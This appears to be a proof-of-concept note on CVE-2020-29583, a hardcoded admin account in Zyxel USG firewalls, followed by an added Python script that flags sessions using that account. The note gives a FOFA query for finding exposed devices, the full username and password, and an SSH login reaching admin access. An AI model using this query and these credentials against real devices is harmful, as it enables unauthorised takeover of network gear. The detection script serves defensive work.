
Zyxel USG Series Hardcoded Account Vulnerability (CVE-2020-29583)

FOFA:

title="USG40"

Username: zyfwp
Password: PrOw!aN_fXp

This account can be used on both the SSH and web interfaces.

$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
  Name: zyfwp
  Type: admin
(...)
Router>
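
A defender-side check for the session listing shown above, as an added example that is not part of the original page: it parses `show users current` output and flags any session logged in as the hardcoded account. The sample output is constructed, and only the `No`, `Name` and `Type` fields visible on the page are assumed.

```python
import re

# Account name taken from the page; a live session under it means the
# undocumented account is present and in use on this device.
HARDCODED_ACCOUNT = "zyfwp"

# "Key: value" lines such as "No: 1" or "  Name: zyfwp".
FIELD_RE = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?):\s*(.*?)\s*$")

# Constructed sample in the layout shown on the page (two sessions).
SAMPLE = """\
Router> show users current
No: 1
  Name: admin
  Type: admin
(...)
No: 2
  Name: zyfwp
  Type: admin
(...)
Router>
"""

def parse_sessions(cli_output):
    """Split 'show users current' output into one dict per session.

    A new record starts at each 'No:' line. Prompts, the echoed command
    and elided '(...)' lines carry no 'Key: value' pair and are skipped.
    """
    sessions, current = [], None
    for line in cli_output.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip().lower(), m.group(2)
        if key == "no":
            current = {"no": value}
            sessions.append(current)
        elif current is not None:  # ignore fields seen before any 'No:'
            current[key] = value
    return sessions

def flag_hardcoded(sessions, account=HARDCODED_ACCOUNT):
    """Return the sessions logged in under the hardcoded account."""
    return [s for s in sessions if s.get("name") == account]

if __name__ == "__main__":
    for s in flag_hardcoded(parse_sessions(SAMPLE)):
        print(f"ALERT: session {s['no']} is '{s['name']}' (type {s.get('type')})")
```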

ref:

  • https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
  • https://twitter.com/dozernz/status/1344435468868358145
  • https://forum.ywhack.com/thread-114904-1-1.html